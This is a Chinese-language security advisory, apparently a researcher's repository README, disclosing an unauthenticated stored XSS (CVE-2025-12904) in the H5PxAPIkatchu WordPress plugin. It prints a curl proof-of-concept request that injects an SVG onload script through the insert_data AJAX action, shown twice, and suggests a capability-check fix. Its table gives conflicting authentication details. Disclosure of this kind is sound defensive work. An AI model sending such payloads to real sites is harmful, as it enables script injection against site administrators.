关于 CVE-2025-12904 的披露
本仓库披露了在 SNORDIAN 的 H5PxAPIkatchu <= 0.4.16 中发现的一个漏洞,该 WordPress 插件由 otacke 开发。
| CVE ID | 类型 | 组件 | 影响 |
|---|---|---|---|
| CVE-2025-12904 | 通过 insert_data 的未认证存储型跨站脚本 | class-table-view.php | 已认证攻击者可执行 JS |
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
--data-urlencode 'action=insert_data' \
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
※如果 object 中的 id 不存在,操作将失败。
insert_data() 函数未执行任何权限检查,允许恶意输入在未经认证的情况下被保存。此外,这些条目在管理界面上未经转义即被显示。
insert_data() 函数应使用 current_user_can 来防止未经授权的执行。创建 PoC 实在太费劲了。
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
在重现这一部分上花了太多时间。希望能更熟练地掌握 curl 命令。 另外,这个插件……各方面都没问题吗?尤其是名字什么的。
姓名: MooseLove
角色: 独立安全研究员 / 漏洞猎人
联系方式: 可应要求提供
本安全公告旨在提升公众安全意识。欢迎署名分享。